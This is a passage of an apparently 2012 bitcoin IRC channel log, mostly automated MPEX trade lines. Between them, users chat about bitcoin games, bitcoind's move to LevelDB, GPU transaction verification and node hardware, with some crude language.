0.00051517 = 5.332 BTC [+] Dec 01 19:30:49 [MPEX] [S.MPOE] 2980 @ 0.00052509 = 1.5648 BTC [+] Dec 01 19:31:29 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.59668103 = 596.681 BTC [-] Dec 01 19:32:19 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.51669697 = 516.697 BTC [-] Dec 01 19:38:19 usagi is now known as Guest99975 > Guest99975 is now known as tsukino. Opps! Dec 01 19:42:40 [MPEX] [S.MPOE] 2345 @ 0.00051858 = 1.2161 BTC [-] Dec 01 19:42:42 [MPEX] [S.MPOE] 19100 @ 0.0005186 = 9.9053 BTC [+] Dec 01 19:42:43 [MPEX] [S.MPOE] 8009 @ 0.00052509 = 4.2054 BTC [+] Dec 01 19:46:09 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.51669697 = 516.697 BTC [-] Dec 01 19:46:15 lol EB Dec 01 19:46:23 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.59668103 = 596.681 BTC [-] Dec 01 19:48:15 [MPEX] [S.MPOE] 2345 @ 0.00052304 = 1.2265 BTC [-] Dec 01 19:48:16 [MPEX] [S.MPOE] 13059 @ 0.00052275 = 6.8266 BTC [-] Dec 01 19:49:24 [MPEX] [S.MPOE] 4704 @ 0.00052275 = 2.459 BTC [-] Dec 01 19:53:17 [MPEX] [S.MPOE] 4452 @ 0.00051641 = 2.2991 BTC [-] Dec 01 19:53:18 [MPEX] [S.MPOE] 2345 @ 0.00052498 = 1.2311 BTC [+] Dec 01 19:53:20 [MPEX] [S.MPOE] 183 @ 0.00052509 = 0.0961 BTC [+] Dec 01 19:53:21 [MPEX] [S.MPOE] 3220 @ 0.00052533 = 1.6916 BTC [+] Dec 01 20:09:49 [MPEX] [S.MPOE] 4800 @ 0.00051972 = 2.4947 BTC [-] Dec 01 20:09:51 [MPEX] [S.MPOE] 2345 @ 0.00051495 = 1.2076 BTC [-] Dec 01 20:09:52 [MPEX] [S.MPOE] 8823 @ 0.00051491 = 4.5431 BTC [-] Dec 01 20:09:53 [MPEX] [S.MPOE] 5182 @ 0.00051406 = 2.6639 BTC [-] Dec 01 20:20:55 [MPEX] [S.MPOE] 2345 @ 0.00052531 = 1.2319 BTC [+] Dec 01 20:20:56 [MPEX] [S.MPOE] 22530 @ 0.00052533 = 11.8357 BTC [+] Dec 01 20:20:57 [MPEX] [S.MPOE] 1875 @ 0.0005254 = 0.9851 BTC [+] Dec 01 20:22:55 [MPEX] [S.DICE] 1839 @ 0.00330905 = 6.0853 BTC [+] Dec 01 20:22:56 [MPEX] [S.DICE] 911 @ 0.00334688 = 3.049 BTC [+] Dec 01 20:36:41 [MPEX] [S.MPOE] 18000 @ 0.0005254 = 9.4572 BTC [+] Dec 01 20:38:17 [MPEX] [S.MPOE] 2345 @ 0.00052021 = 1.2199 BTC [-] Dec 01 20:38:19 [MPEX] [S.MPOE] 2345 @ 0.0005202 = 1.2199 BTC [-] Dec 01 20:38:20 [MPEX] [S.MPOE] 3219 @ 0.00052001 = 1.6739 BTC [-] Dec 01 20:38:21 [MPEX] [S.MPOE] 33374 @ 0.00051997 = 17.3535 BTC [-] Dec 01 20:41:04 [MPEX] [S.MPOE] 4321 @ 0.00052 = 2.2469 BTC [+] Dec 01 20:41:05 [MPEX] [S.MPOE] 1126 @ 0.00051997 = 0.5855 BTC [-] Dec 01 20:44:03 [MPEX] [S.MPOE] 7551 @ 0.00051406 = 3.8817 BTC [-] Dec 01 20:44:03 [MPEX] [S.MPOE] 15199 @ 0.00051286 = 7.795 BTC [-] Dec 01 20:48:34 [MPEX] [S.MPOE] 4321 @ 0.00051962 = 2.2453 BTC [+] Dec 01 20:48:34 [MPEX] [S.MPOE] 4479 @ 0.00051976 = 2.328 BTC [+] Dec 01 20:51:27 [MPEX] [S.MPOE] 4321 @ 0.00051293 = 2.2164 BTC [-] Dec 01 20:51:29 [MPEX] [S.MPOE] 1079 @ 0.00051286 = 0.5534 BTC [-] Dec 01 20:58:45 [MPEX] [S.MPOE] 4321 @ 0.00051962 = 2.2453 BTC [+] Dec 01 20:58:47 [MPEX] [S.MPOE] 12024 @ 0.00051976 = 6.2496 BTC [+] Dec 01 20:58:48 [MPEX] [S.MPOE] 705 @ 0.0005254 = 0.3704 BTC [+] Dec 01 21:03:26 [MPEX] [S.MPOE] 4321 @ 0.00051306 = 2.2169 BTC [-] Dec 01 21:03:28 [MPEX] [S.MPOE] 792 @ 0.00051286 = 0.4062 BTC [-] Dec 01 21:03:29 [MPEX] [S.MPOE] 16083 @ 0.00051146 = 8.2258 BTC [-] Dec 01 21:03:30 [MPEX] [S.MPOE] 8604 @ 0.00051101 = 4.3967 BTC [-] Dec 01 21:05:27 [MPEX] [S.MPOE] 8996 @ 0.00051101 = 4.597 BTC [-] Dec 01 21:05:29 [MPEX] [S.MPOE] 12104 @ 0.00051048 = 6.1788 BTC [-] Dec 01 21:13:33 [MPEX] [S.MPOE] 15250 @ 0.00051048 = 7.7848 BTC [-] Dec 01 21:16:00 [MPEX] [S.MPOE] 4321 @ 0.00052534 = 2.27 BTC [+] Dec 01 21:16:02 [MPEX] [S.MPOE] 6270 @ 0.0005254 = 3.2943 BTC [+] Dec 01 21:16:03 [MPEX] [S.MPOE] 9961 @ 0.00052543 = 5.2338 BTC [+] Dec 01 21:17:21 [MPEX] [S.MPOE] 4321 @ 0.00052522 = 2.2695 BTC [-] Dec 01 21:17:21 [MPEX] [S.MPOE] 689 @ 0.00052543 = 0.362 BTC [+] Dec 01 21:17:23 [MPEX] [S.MPOE] 13150 @ 0.00052544 = 6.9095 BTC [+] Dec 01 21:17:24 [MPEX] [S.MPOE] 13353 @ 0.00052601 = 7.0238 BTC [+] Dec 01 21:17:25 [MPEX] [S.MPOE] 437 @ 0.00052627 = 0.23 BTC [+] Dec 01 21:18:50 [MPEX] [S.MPOE] 4321 @ 0.00051051 = 2.2059 BTC [-] Dec 01 21:18:51 [MPEX] [S.MPOE] 17039 @ 0.00051048 = 8.6981 BTC [-] Dec 01 21:21:23 [MPEX] [S.MPOE] 4321 @ 0.00051058 = 2.2062 BTC [+] Dec 01 21:21:24 [MPEX] [S.MPOE] 22957 @ 0.00051048 = 11.7191 BTC [-] Dec 01 21:21:26 [MPEX] [S.MPOE] 3728 @ 0.00050992 = 1.901 BTC [-] Dec 01 21:27:25 [MPEX] [S.MPOE] 4321 @ 0.00050995 = 2.2035 BTC [+] Dec 01 21:27:27 [MPEX] [S.MPOE] 18181 @ 0.00050992 = 9.2709 BTC [-] Dec 01 21:27:28 [MPEX] [S.MPOE] 6898 @ 0.00050989 = 3.5172 BTC [-] Dec 01 21:31:56 [MPEX] [S.MPOE] 1300 @ 0.00052607 = 0.6839 BTC [+] Dec 01 21:39:32 [MPEX] [S.MPOE] 3752 @ 0.00050989 = 1.9131 BTC [-] Dec 01 21:39:33 [MPEX] [S.MPOE] 22582 @ 0.00050985 = 11.5134 BTC [-] Dec 01 21:48:55 [MPEX] [S.MPOE] 9800 @ 0.00051777 = 5.0741 BTC [+] Dec 01 22:13:22 [MPEX] [S.MPOE] 11800 @ 0.00051404 = 6.0657 BTC [-] Dec 01 22:13:23 [MPEX] [S.MPOE] 10325 @ 0.00050985 = 5.2642 BTC [-] Dec 01 22:13:25 [MPEX] [S.MPOE] 35950 @ 0.0005098 = 18.3273 BTC [-] Dec 01 22:13:26 [MPEX] [S.MPOE] 17025 @ 0.00050978 = 8.679 BTC [-] Dec 01 22:22:52 [MPEX] [S.MPOE] 15000 @ 0.00051278 = 7.6917 BTC [+] Dec 01 22:23:35 [MPEX] [S.MPOE] 4321 @ 0.00051698 = 2.2339 BTC [+] Dec 01 22:23:36 [MPEX] [S.MPOE] 4329 @ 0.00051727 = 2.2393 BTC [+] Dec 01 22:27:03 [MPEX] [S.DICE] 2350 @ 0.00334688 = 7.8652 BTC [+] Dec 01 22:27:54 [MPEX] [S.MPOE] 4321 @ 0.00051634 = 2.2311 BTC [-] Dec 01 22:27:56 [MPEX] [S.MPOE] 16750 @ 0.00051605 = 8.6438 BTC [-] Dec 01 22:29:17 [MPEX] [S.MPOE] 2225 @ 0.00050978 = 1.1343 BTC [-] Dec 01 22:29:19 [MPEX] [S.MPOE] 10800 @ 0.00050975 = 5.5053 BTC [-] Dec 01 22:29:20 [MPEX] [S.MPOE] 5985 @ 0.00050973 = 3.0507 BTC [-] Dec 01 22:29:21 [MPEX] [S.MPOE] 14000 @ 0.00050956 = 7.1338 BTC [-] Dec 01 22:29:23 [MPEX] [S.MPOE] 20300 @ 0.00050952 = 10.3433 BTC [-] Dec 01 22:29:24 [MPEX] [S.MPOE] 15590 @ 0.00050935 = 7.9408 BTC [-] Dec 01 22:29:58 [MPEX] [S.MPOE] 4129 @ 0.00051435 = 2.1238 BTC [+] Dec 01 22:29:59 [MPEX] [S.MPOE] 1721 @ 0.00051695 = 0.8897 BTC [+] Dec 01 22:30:00 [MPEX] [S.MPOE] 11871 @ 0.00051727 = 6.1405 BTC [+] Dec 01 22:45:48 [MPEX] [S.MPOE] 4321 @ 0.00052609 = 2.2732 BTC [+] Dec 01 22:45:50 [MPEX] [S.MPOE] 9979 @ 0.00052627 = 5.2516 BTC [+] Dec 01 22:49:17 [MPEX] [S.MPOE] 4321 @ 0.00052406 = 2.2645 BTC [-] Dec 01 22:49:18 [MPEX] [S.MPOE] 20927 @ 0.00052404 = 10.9666 BTC [-] Dec 01 22:56:30 [MPEX] [S.MPOE] 4321 @ 0.00052606 = 2.2731 BTC [+] Dec 01 22:56:31 [MPEX] [S.MPOE] 12593 @ 0.00052627 = 6.6273 BTC [+] Dec 01 23:00:57 kakobrekla : http://trilema.com/2012/dragons-tale-a-bitcoin-linux-mmorpg/ Dec 01 23:01:06 i made 150 btc today with that, suffer. Dec 01 23:01:07 cry. Dec 01 23:03:12 did someone say bitcoin linux mmorpg? Dec 01 23:04:06 mircea_popescu: I should make some sort of bitcoin powered game Dec 01 23:04:15 i did yeah Dec 01 23:04:21 and that may be a good idea Diablo-D3. Dec 01 23:04:30 be like Dec 01 23:04:33 GIANT FUCKING SPACE SHIPS Dec 01 23:04:35 IN SPACE Dec 01 23:04:43 and only a tiny subset of them penis shaped. Dec 01 23:05:18 >galonsized herbivore variant Dec 01 23:06:09 but I love giant tits :< Dec 01 23:06:41 mircea_popescu: so what Ill have to do is Dec 01 23:06:45 finish seaking Dec 01 23:06:55 that language of mine that focuses on large scale data processing Dec 01 23:07:52 or that. Dec 01 23:08:36 well, for example Dec 01 23:08:38 look at minecraft Dec 01 23:08:49 its in java Dec 01 23:09:21 it was written by someone who didnt know how to wring every last bit of performance from java Dec 01 23:09:21 [MPEX] [S.MPOE] 4321 @ 0.00052616 = 2.2735 BTC [-] Dec 01 23:09:21 [MPEX] [S.MPOE] 13883 @ 0.00052627 = 7.3062 BTC [+] Dec 01 23:09:21 [MPEX] [S.MPOE] 3396 @ 0.00052643 = 1.7878 BTC [+] Dec 01 23:09:21 arguably, even if it was written by me, it may still be a fucking pig Dec 01 23:09:24 because you just cant win there Dec 01 23:09:51 now, lets say he wrote it with seaking Dec 01 23:10:29 or really, lets say I wrote it with seaking because notch is a fucktard when it comes to coding Dec 01 23:10:41 it would scale across as many machines as you could feed it Dec 01 23:10:43 [MPEX] [S.DICE] 439 @ 0.00334688 = 1.4693 BTC [+] Dec 01 23:10:44 [MPEX] [S.DICE] 461 @ 0.00337971 = 1.558 BTC [+] Dec 01 23:13:01 so go ahead. Dec 01 23:13:07 btc games is certainly a good line to be in. Dec 01 23:13:23 [MPEX] [S.MPOE] 4321 @ 0.00052405 = 2.2644 BTC [-] Dec 01 23:13:24 [MPEX] [S.MPOE] 507 @ 0.00052404 = 0.2657 BTC [-] Dec 01 23:13:30 seriously like Dec 01 23:13:48 you know those extra sexy top500 things they keep doing like porno photo spreads of? Dec 01 23:14:04 [MPEX] [S.MPOE] 4321 @ 0.00052435 = 2.2657 BTC [+] Dec 01 23:14:05 [MPEX] [S.MPOE] 39316 @ 0.00052404 = 20.6032 BTC [-] Dec 01 23:14:07 [MPEX] [S.MPOE] 2129 @ 0.00051975 = 1.1065 BTC [-] Dec 01 23:14:15 seaking would eat those for breakfast and have room for more Dec 01 23:18:07 [MPEX] [S.DICE] 1439 @ 0.00337971 = 4.8634 BTC [+] Dec 01 23:18:09 [MPEX] [S.DICE] 949 @ 0.00339999 = 3.2266 BTC [+] Dec 01 23:18:11 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.51669697 = 516.697 BTC [-] Dec 01 23:18:17 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.59668103 = 596.681 BTC [-] Dec 01 23:22:20 [MPEX] [S.MPOE] 12065 @ 0.00051822 = 6.2523 BTC [-] Dec 01 23:24:28 [MPEX] [S.MPOE] 619 @ 0.00051822 = 0.3208 BTC [-] Dec 01 23:27:37 [MPEX] [S.DICE] 2100 @ 0.00339999 = 7.14 BTC [+] Dec 01 23:31:36 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.59668103 = 596.681 BTC [-] Dec 01 23:31:40 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.51669697 = 516.697 BTC [-] Dec 01 23:31:58 Diablo-D3, there's some theory around that full bitcoin client itself will need to be parallelized to be able to keep with tx volume Dec 01 23:32:08 jurov: probably not Dec 01 23:32:13 not the way that I was discussing above Dec 01 23:32:28 you could pretty much do what I already do with diablominer Dec 01 23:32:41 infact, gpus would be massive overkill Dec 01 23:32:42 diablominer is the new python Dec 01 23:32:53 lets say you had the tx volume of the entire planet Dec 01 23:33:00 thats what we do in a year in an hour. Dec 01 23:33:08 or hell, in a minute Dec 01 23:33:15 several billion tx a day Dec 01 23:33:28 a 7970 would be overkill for the math part. Dec 01 23:33:56 you could process and verify the entire day's chain in a few minutes if you parallelized it as much as possible on a 7970 Dec 01 23:35:14 yes? then someone should do that... the initial blockchain sync is painful and it's supposedly cpu bound Dec 01 23:35:42 jurov: no Dec 01 23:35:45 its IO bound Dec 01 23:35:55 because bdb is fucking retarded and not meant to handle 2gb of data Dec 01 23:36:06 thats already been fixed, it just hasnt shipped yet Dec 01 23:36:58 0.8 will ship with leveldb (google's kv store thats basically as fast as kyoto cabinet) Dec 01 23:37:07 (seriously, kv stores just arent getting any faster) Dec 01 23:37:20 if you have unlimited network and disk IO Dec 01 23:37:30 0.8 will sync the chain in like 3 hours Dec 01 23:37:37 oh okay, i mixed it up... Dec 01 23:38:07 I think sipa or gmaxwell said they can load an already existing dbd chain into leveldb in 15 minutes Dec 01 23:38:50 jurov: now Dec 01 23:38:53 once we have that fixed Dec 01 23:39:06 where disk io is no longer a problem because bdb is fucktarded Dec 01 23:39:12 cpu is next Dec 01 23:39:24 but, as I said, we simply dont generate enough tx to matter Dec 01 23:39:34 unless you have bitcoind on a rpi or something stupid like that, its not an issue Dec 01 23:40:52 [MPEX] [S.MPOE] 4321 @ 0.00052631 = 2.2742 BTC [+] Dec 01 23:40:54 [MPEX] [S.MPOE] 27304 @ 0.00052643 = 14.3736 BTC [+] Dec 01 23:40:55 [MPEX] [S.MPOE] 775 @ 0.00052652 = 0.4081 BTC [+] Dec 01 23:41:07 now, if you do, you're still somewhat fucked Dec 01 23:41:17 theres no opencl for the gpu that rpis have Dec 01 23:42:38 i'm actually thinking to procure some lean server for that purpose, already ruled rpi out cause of tight memory Dec 01 23:42:47 yeah, like Dec 01 23:42:53 man, an engineer would do a better pr job than josh does Dec 01 23:42:55 I wouldnt use rpi now because I use p2pool Dec 01 23:42:57 and that just isnt happening Dec 01 23:42:58 next on list is via nano, with their sha256 instruction support Dec 01 23:43:11 jurov: nope Dec 01 23:43:12 isnt worth it Dec 01 23:43:14 but maybe ecdsa is bigger problem... Dec 01 23:43:29 vias do about 1mhash/sec Dec 01 23:43:43 doing it on the x86 core itself you get more than that. Dec 01 23:43:57 you say atom then? Dec 01 23:44:04 neither Dec 01 23:44:10 I'd go with an amd fusion Dec 01 23:44:20 the newest ones with the GCN GPU Dec 01 23:46:41 i'm a bit confused bitcoind has opencl support... or the fusion has such a good x86 computation power? Dec 01 23:47:43 bitcoind in the future will have opencl support Dec 01 23:48:02 fusions are good cheap cpus. Dec 01 23:48:11 bitcoind rapes memory bandwidth Dec 01 23:48:17 atoms and nanos dont have it Dec 01 23:48:31 previous gen fusions use dual channel ddr3-1333, new ones I think are 1600 or 1866 Dec 01 23:48:51 and its not like they use a lot of power Dec 01 23:48:53 they dont Dec 01 23:49:44 and with two ddr3 slots, you can throw 8gb of memory in Dec 01 23:49:55 [MPEX] [S.MPOE] 4321 @ 0.00052341 = 2.2617 BTC [-] Dec 01 23:49:56 [MPEX] [S.MPOE] 10039 @ 0.00052323 = 5.2527 BTC [-] Dec 01 23:49:59 good to know Dec 01 23:50:01 that means caching the entire chain and having another 6gb free. Dec 01 23:50:20 actually sorry Dec 01 23:50:23 you can throw 16gb in Dec 01 23:50:32 it just gets expensive putting that much in Dec 01 23:50:47 although the next box Im building Im putting 32 in, so heh Dec 01 23:51:01 jurov: basically, bitcoind will have what it needs by the time we need it Dec 01 23:51:21 so if it comes to the point we need to parallel verify incoming tx on gpus, we will Dec 01 23:51:41 that'll be the day where every tx in the world is done using bitcoin. Dec 01 23:51:42 [MPEX] [S.MPOE] 4321 @ 0.00052644 = 2.2747 BTC [+] Dec 01 23:51:42 [MPEX] [S.MPOE] 11479 @ 0.00052652 = 6.0439 BTC [+] Dec 01 23:53:11 okay. just that i was talking with someone who did a thesis on that Dec 01 23:53:40 and he was convinced that network speed will be the first bottleneck Dec 01 23:54:04 have to wait till he finishes it to see the exact reasoning Dec 01 23:55:36 so from there i derived maybe it will be necessary to loadbalance the processing, like high intensity HTTP is done now Dec 01 23:55:41 [MPEX] [S.MPOE] 4321 @ 0.00052649 = 2.275 BTC [-] Dec 01 23:55:42 [MPEX] [S.MPOE] 12421 @ 0.00052652 = 6.5399 BTC [+] Dec 01 23:55:43 [MPEX] [S.MPOE] 14208 @ 0.00052732 = 7.4922 BTC [+] Dec 01 23:56:38 [MPEX] [O.BTCUSD.P190T] 1000 @ 0.51669697 = 516.697 BTC [-] Dec 01 23:56:45 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.59668103 = 596.681 BTC [-] Dec 01 23:57:36 ^^^ should have bought some bonds.. but dunno what happens to btcusd now Dec 01 23:58:58 grace period is 48 hours, you still got a little time. Dec 02 00:00:31 [MPEX] [S.MPOE] 142 @ 0.00052732 = 0.0749 BTC [+] Dec 02 00:00:32 [MPEX] [S.MPOE] 13175 @ 0.00052733 = 6.9476 BTC [+] Dec 02 00:00:55 22:47.41 ( Diablo-D3 ) bitcoind in the future will have opencl support Dec 02 00:00:57 urlpls? Dec 02 00:01:09 fuckin scrollback. Dec 02 00:01:42 what Dec 02 00:01:46 what are buying? Dec 02 00:01:50 we* Dec 02 00:01:54 lolwat ? Dec 02 00:02:18 22:57.34 ( jurov ) ^^^ should have bought some bonds.. but dunno what happens to btcusd now Dec 02 00:02:18 22:58.56 ( mircea_popescu ) grace period is 48 hours, you still got a little time. Dec 02 00:02:23 umm Dec 02 00:02:27 talking about mpoe? Dec 02 00:02:45 yes, seeing as thousands of opts are being sold again Dec 02 00:02:58 hmmm Dec 02 00:03:44 ya bonds Dec 02 00:04:23 what was the roi this past month? Dec 02 00:04:54 [MPEX] [S.MPOE] 18175 @ 0.00052733 = 9.5842 BTC [+] Dec 02 00:04:55 [MPEX] [S.MPOE] 9125 @ 0.00052769 = 4.8152 BTC [+] Dec 02 00:05:38 ~5% Dec 02 00:05:53 >>I'd have said the stupid days of Bitcoin are behind us. Sorta like how the Van Buren crisis brought an end to the stupid days of America. Dec 02 00:06:01 stupid days in america are over?!? Dec 02 00:07:26 huh ? Dec 02 00:07:33 -PR words. Dec 02 00:08:18 https://bitcointalk.org/index.php?topic=124441.msg1371901#msg1371901 Dec 02 00:09:55 i'm pretend to be stupid in case anyone misses it Dec 02 00:10:05 i'll Dec 02 00:15:05 lol Dec 02 00:15:09 i guess she means speculation Dec 02 00:17:34 https://bitcointalk.org/index.php?topic=128699.msg1371863;topicseen#msg1371863 Dec 02 00:18:54 [MPEX] [S.MPOE] 16068 @ 0.00052769 = 8.4789 BTC [+] Dec 02 00:18:56 [MPEX] [S.MPOE] 2882 @ 0.00052792 = 1.5215 BTC [+] Dec 02 00:25:53 [MPEX] [S.MPOE] 4321 @ 0.00052431 = 2.2655 BTC [-] Dec 02 00:25:55 [MPEX] [S.MPOE] 15185 @ 0.00052423 = 7.9604 BTC [-] Dec 02 00:32:07 we need a web of trolls Dec 02 00:33:04 the troll density in this community is drowning it in retardation Dec 02 00:34:04 integrating a troll wot into forums or an greasemonkey script would save us a shitload of time filtering these fucktards our selves Dec 02 00:36:21 [MPEX] [S.MPOE] 4321 @ 0.0005255 = 2.2707 BTC [+] Dec 02 00:36:23 [MPEX] [S.MPOE] 5779 @ 0.00052549 = 3.0368 BTC [-] Dec 02 00:38:19 [MPEX] [S.MPOE] 2621 @ 0.00052549 = 1.3773 BTC [-] Dec 02 00:38:20 [MPEX] [S.MPOE] 12043 @ 0.00052516 = 6.3245 BTC [-] Dec 02 00:39:47 [MPEX] [S.MPOE] 3004 @ 0.00052516 = 1.5776 BTC [-] Dec 02 00:39:48 [MPEX] [S.MPOE] 1215 @ 0.00052423 = 0.6369 BTC [-] Dec 02 00:39:50 [MPEX] [S.MPOE] 298 @ 0.00052323 = 0.1559 BTC [-] Dec 02 00:39:51 [MPEX] [S.MPOE] 1607 @ 0.00052312 = 0.8407 BTC [-] Dec 02 00:39:52 [MPEX] [S.MPOE] 6150 @ 0.00052222 = 3.2117 BTC [-] Dec 02 00:39:53 [MPEX] [S.MPOE] 2226 @ 0.00052196 = 1.1619 BTC [-] Dec 02 00:41:03 [MPEX] [S.MPOE] 22200 @ 0.00052196 = 11.5875 BTC [-] Dec 02 00:43:16 [MPEX] [S.MPOE] 3174 @ 0.00052196 = 1.6567 BTC [-] Dec 02 00:43:17 [MPEX] [S.MPOE] 3910 @ 0.00051972 = 2.0321 BTC [-] Dec 02 00:47:21 [MPEX] [S.MPOE] 29750 @ 0.00051972 = 15.4617 BTC [-] Dec 02 00:49:26 [MPEX] [S.MPOE] 9121 @ 0.00051972 = 4.7404 BTC [-] Dec 02 00:49:28 [MPEX] [S.MPOE] 4179 @ 0.00051772 = 2.1636 BTC [-] Dec 02 00:50:11 [MPEX] [S.MPOE] 12921 @ 0.00051772 = 6.6895 BTC [-] Dec 02 01:11:27 [MPEX] [S.MPOE] 1979 @ 0.00051496 = 1.0191 BTC [-] Dec 02 01:19:07 [MPEX] [S.MPOE] 4321 @ 0.00052775 = 2.2804 BTC [+] Dec 02 01:19:09 [MPEX] [S.MPOE] 10829 @ 0.00052792 = 5.7168 BTC [+] Dec 02 01:27:08 [MPEX] [S.MPOE] 4321 @ 0.00052778 = 2.2805 BTC [-] Dec 02 01:27:10 [MPEX] [S.MPOE] 10709 @ 0.00052792 = 5.6535 BTC [+] Dec 02 01:27:11 [MPEX] [S.MPOE] 4700 @ 0.000528 = 2.4816 BTC [+] Dec 02 01:27:12 [MPEX] [S.MPOE] 3000 @ 0.00052804 = 1.5841 BTC [+] Dec 02 01:27:12 [MPEX] [S.MPOE] 2076 @ 0.00052838 = 1.0969 BTC [+] Dec 02 01:38:40 [MPEX] [S.MPOE] 4321 @ 0.00052273 = 2.2587 BTC [-] Dec 02 01:38:41 [MPEX] [S.MPOE] 6196 @ 0.00052238 = 3.2367 BTC [-] Dec 02 01:51:53 [MPEX] [S.MPOE] 4321 @ 0.00052416 = 2.2649 BTC [+] Dec 02 01:51:54 [MPEX] [S.MPOE] 1779 @ 0.00052391 = 0.932 BTC [-] Dec 02 01:53:46 [MPEX] [S.MPOE] 766 @ 0.00052812 = 0.4045 BTC [+] Dec 02 01:59:57 [MPEX] [S.MPOE] 3555 @ 0.00052812 = 1.8775 BTC [+] Dec 02 01:59:58 [MPEX] [S.MPOE] 14024 @ 0.00052838 = 7.41 BTC [+] Dec 02 02:00:00 [MPEX] [S.MPOE] 13221 @ 0.0005287 = 6.9899 BTC [+] Dec 02 02:04:00 [MPEX] [S.MPOE] 4321 @ 0.0005285 = 2.2836 BTC [-] Dec 02 02:04:00 [MPEX] [S.MPOE] 4479 @ 0.0005287 = 2.368 BTC [+] Dec 02 02:10:31 [MPEX] [S.MPOE] 4321 @ 0.00052729 = 2.2784 BTC [-] Dec 02 02:10:32 [MPEX] [S.MPOE] 9079 @ 0.00052716 = 4.7861 BTC [-] Dec 02 02:11:24 [MPEX] [S.MPOE] 4321 @ 0.00052722 = 2.2781 BTC [+] Dec 02 02:11:25 [MPEX] [S.MPOE] 6871 @ 0.00052716 = 3.6221 BTC [-] Dec 02 02:11:26 [MPEX] [S.MPOE] 5908 @ 0.00052391 = 3.0953 BTC [-] Dec 02 02:11:37 this shit is like a mexican soap opera: https://bitcointalk.org/index.php?topic=113708.msg1371887#msg1371887 Dec 02 02:15:34 [MPEX] [S.MPOE] 4321 @ 0.00052407 = 2.2645 BTC [+] Dec 02 02:15:35 [MPEX] [S.MPOE] 23379 @ 0.00052391 = 12.2485 BTC [-] Dec 02 02:25:00 [MPEX] [S.MPOE] 6461 @ 0.00052391 = 3.385 BTC [-] Dec 02 02:33:35 [MPEX] [S.MPOE] 3700 @ 0.00052488 = 1.9421 BTC [+] Dec 02 02:33:36 [MPEX] [S.MPOE] 4321 @ 0.00052849 = 2.2836 BTC [+] Dec 02 02:33:38 [MPEX] [S.MPOE] 7220 @ 0.0005287 = 3.8172 BTC [+] Dec 02 02:33:39 [MPEX] [S.MPOE] 14959 @ 0.00052896 = 7.9127 BTC [+] Dec 02 02:36:25 [MPEX] [S.MPOE] 4321 @ 0.00052409 = 2.2646 BTC [-] Dec 02 02:36:26 [MPEX] [S.MPOE] 12773 @ 0.00052391 = 6.6919 BTC [-] Dec 02 02:36:28 [MPEX] [S.MPOE] 4206 @ 0.00052345 = 2.2016 BTC [-] Dec 02 02:40:33 [MPEX] [S.MPOE] 3368 @ 0.00052345 = 1.763 BTC [-] Dec 02 02:43:59 [MPEX] [S.DICE] 5100 @ 0.0033937 = 17.3079 BTC [-] Dec 02 02:44:01 [MPEX] [S.DICE] 1350 @ 0.00339999 = 4.59 BTC [+] Dec 02 02:49:41 [MPEX] [S.MPOE] 4176 @ 0.00052345 = 2.1859 BTC [-] Dec 02 02:49:42 [MPEX] [S.MPOE] 11254 @ 0.00052238 = 5.8789 BTC [-] Dec 02 02:49:44 [MPEX] [S.MPOE] 14120 @ 0.00052006 = 7.3432 BTC [-] Dec 02 03:01:38 [MPEX] [S.MPOE] 5630 @ 0.00052006 = 2.9279 BTC [-] Dec 02 03:18:58 [MPEX] [S.MPOE] 13470 @ 0.00051829 = 6.9814 BTC [-] Dec 02 03:31:21 [MPEX] [S.MPOE] 18550 @ 0.00051829 = 9.6143 BTC [-] Dec 02 03:35:19 [MPEX] [S.MPOE] 13200 @ 0.00051964 = 6.8592 BTC [+] Dec 02 03:47:53 [MPEX] [S.MPOE] 23450 @ 0.0005195 = 12.1823 BTC [-] Dec 02 04:04:50 [MPEX] [S.MPOE] 5650 @ 0.0005195 = 2.9352 BTC [-] Dec 02 04:04:51 [MPEX] [S.MPOE] 2680 @ 0.00051829 = 1.389 BTC [-] Dec 02 04:04:53 [MPEX] [S.MPOE] 24320 @ 0.00051703 = 12.5742 BTC [-] Dec 02 04:09:21 [MPEX] [S.MPOE] 23580 @ 0.00051703 = 12.1916 BTC [-] Dec 02 04:09:23 [MPEX] [S.MPOE] 4720 @ 0.00051674 = 2.439 BTC [-] Dec 02 04:15:47 [MPEX] [S.MPOE] 220 @ 0.00051964 = 0.1143 BTC [+] Dec 02 04:15:49 [MPEX] [S.MPOE] 23450 @ 0.00051988 = 12.1912 BTC [+] Dec 02 04:15:50 [MPEX] [S.MPOE] 22830 @ 0.0005202 = 11.8762 BTC [+] Dec 02 04:16:37 [MPEX] [S.DICE] 2600 @ 0.00334398 = 8.6943 BTC [-] Dec 02 04:22:18 [MPEX] [S.DICE] 2200 @ 0.00334106 = 7.3503 BTC [-] Dec 02 04:23:11 [MPEX] [S.MPOE] 3070 @ 0.0005202 = 1.597 BTC [+] Dec 02 04:23:12 [MPEX] [S.MPOE] 2315 @ 0.00052099 = 1.2061 BTC [+] Dec 02 04:27:41 [MPEX] [S.MPOE] 18435 @ 0.00052099 = 9.6045 BTC [+] Dec 02 04:27:43 [MPEX] [S.MPOE] 20143 @ 0.00052517 = 10.5785 BTC [+] Dec 02 04:27:43 [MPEX] [S.MPOE] 5472 @ 0.00052881 = 2.8936 BTC [+] Dec 02 04:31:03 [MPEX] [S.MPOE] 3350 @ 0.00051674 = 1.7311 BTC [-] Dec 02 04:37:16 [MPEX] [S.MPOE] 4962 @ 0.00051674 = 2.5641 BTC [-] Dec 02 04:39:04 [MPEX] [S.MPOE] 5850 @ 0.00052081 = 3.0467 BTC [+] Dec 02 04:41:11 [MPEX] [S.MPOE] 14344 @ 0.00051674 = 7.4121 BTC [-] Dec 02 04:51:10 [MPEX] [S.MPOE] 2339 @ 0.00051674 = 1.2087 BTC [-] Dec 02 04:51:58 [MPEX] [S.MPOE] 23427 @ 0.00052081 = 12.201 BTC [+] Dec 02 04:56:14 [MPEX] [S.MPOE] 27870 @ 0.00052081 = 14.515 BTC [+] Dec 02 05:00:31 [MPEX] [S.MPOE] 1603 @ 0.00052081 = 0.8349 BTC [+] Dec 02 05:00:33 [MPEX] [S.MPOE] 8750 @ 0.00052873 = 4.6264 BTC [+] Dec 02 05:00:34 [MPEX] [S.MPOE] 2928 @ 0.00052881 = 1.5484 BTC [+] Dec 02 05:00:35 [MPEX] 